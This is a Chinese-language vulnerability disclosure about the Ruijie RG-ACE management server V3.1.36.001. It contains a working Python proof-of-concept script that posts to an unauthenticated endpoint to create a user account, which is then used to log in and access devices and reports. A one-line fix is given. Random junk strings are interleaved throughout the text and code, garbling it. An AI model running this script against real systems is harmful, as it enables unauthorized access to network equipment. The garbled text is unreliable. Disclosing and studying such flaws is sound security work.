锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
( X5 S6 L4 Z: o; }4 h8 O# J
6 w" y8 X# V \( Y }. L& e2 }5 m% w7 a
测试的具体版本是
- ?4 D4 q- p% n, }4 Z产品名称: 锐捷应用控制引擎
( o" T, b, U; b* }版本号: 3.1.36.001 TC! N" d5 h. x/ z3 w' T4 L
编译时间: 201104291730, M6 ~' o" Y' F/ t0 V4 s* A0 V( S
2 h( A. r# _* L" |; @$ q& L; O3 |! t9 u( ^0 i3 D# r
漏洞证明:
# P# Z8 h; ^. j! l9 [4 J
5 X+ M s$ E. n+ W
2 b5 f! z- q. ~
+ o& ?. r; E c% F; _+ p `0 S/ |" C/ b8 ?( F
( l0 s1 B3 w4 G6 I! {) }$ r7 ^; ]: ]3 b
执行脚本, @4 y$ A$ U% S j; \
#! /usr/bin/env python7 W& O- z& C0 F+ L" I, T
#coding=gbk( j2 \4 O" u+ c r
#RG-ACE管理服务器 V3.1.36.001
# L1 v# y' U8 b9 a. x, iimport urllib2, urllib,cookielib0 @) N% h e- F) N& `
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
5 F' r/ e4 Z1 Q- p9 |opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))# o: ]4 e2 q2 u7 a5 c( a, Z% q
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
$ W! s1 H$ O3 X$ E( F zpost=(("event","userManager.doInsertUserInfo"),) G' S' D6 t& }! [! S' g
("useractionname","addButtonValue"),
$ u9 P9 T7 o- f" F/ B5 h6 R2 |("useropermanager","userManager"),% u6 ]: ]- A$ P z* B
("userName","t"), #######账号自己加
$ p4 O4 U3 S$ L9 S4 U("pwd","aaaaaa"),######密码自己加' ]$ b# d% v. J) `+ e# f
("trueName","ad"),
7 ^" m# i1 z0 _- I; e5 G: }("email",""),
" `$ V5 {! ? @+ Y; v- d: U("mobilePhone",""),% M) W' A1 r: u- o3 S. N
("officePhone",""),
' B9 d! G: j4 M% A3 O3 z) T+ i o("addr",""),% E. {. B# I3 y6 N/ K
("submit","确定"))
( C# q& e. _ e( p5 e4 I; Turllib2.install_opener(opener)& }2 M. M( p1 J* {" v4 t0 Z
p=urllib2.urlopen(url, urllib.urlencode(post)).read()6 i, |4 G) S4 ]3 W+ G& l
print "Done"+ F1 J2 D" m% ^; s4 ]
# u8 X2 C- |5 t' |7 L
登录,连接设备
6 p1 Z, I- J# M8 j+ i5 k" J
7 D2 n( B# ^6 h: l& Q$ m3 }: H3 {$ d# i3 C
7 g# a' w9 r6 m7 h- \
6 K" I" O" ^6 I) Z, D* O6 R8 P3 N; H8 t3 r1 Q, k/ s3 `
默认的管理员admin权限更大点
, L: T$ p( {3 E+ s; U8 m* ^8 X' c/ a7 D7 u! v1 u% _4 \9 o- _
& J* a( P- Q4 w, n: w8 ~
+ ~, t& m- J# T7 b5 g ; o7 y- i1 x; B _0 G1 S) v: |7 J
. z/ ]+ | C, g% h修复方案:
$ n3 ^2 r5 @4 x0 @9 }4 G+ D2 W加强对接口的权限验证
R; u: Y4 b3 S5 T. V7 F
; q( h" ?- Z, l( _. s |